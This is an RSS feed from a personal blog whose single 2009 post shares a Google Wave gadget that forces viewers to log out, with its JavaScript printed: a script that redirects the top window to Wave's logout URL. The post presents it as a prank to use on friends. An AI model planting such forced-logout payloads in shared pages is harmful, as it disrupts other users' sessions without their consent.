<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stuff &#187; wave</title>
	<atom:link href="http://blog.beford.org/tag/wave/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.beford.org</link>
	<description></description>
	<lastBuildDate>Tue, 18 Oct 2011 11:33:49 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Google Wave &#8211; Make your friends logout gadget</title>
		<link>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/</link>
		<comments>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/#comments</comments>
		<pubDate>Fri, 20 Nov 2009 04:04:14 +0000</pubDate>
		<dc:creator>Fernando M</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wave]]></category>
		<category><![CDATA[xml]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.beford.org/?p=58</guid>
		<description><![CDATA[Adding this gadget to any wave will make people log out when they see it: http://beford.org/stuff/waveg.xml The code: &#60;script type="text/javascript"&#62; top.location="https://wave.google.com/wave/logout"; &#60;/script&#62;]]></description>
			<content:encoded><![CDATA[<p>Adding this gadget to any wave will make people log out when they see it:</p>
<p><a href="http://beford.org/stuff/waveg.xml">http://beford.org/stuff/waveg.xml</a></p>
<p>The code:</p>
<p><code>&lt;script type="text/javascript"&gt;<br />
top.location="https://wave.google.com/wave/logout";<br />
&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.beford.org/2009/11/20/google-wave-make-your-friends-logout-gadget/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

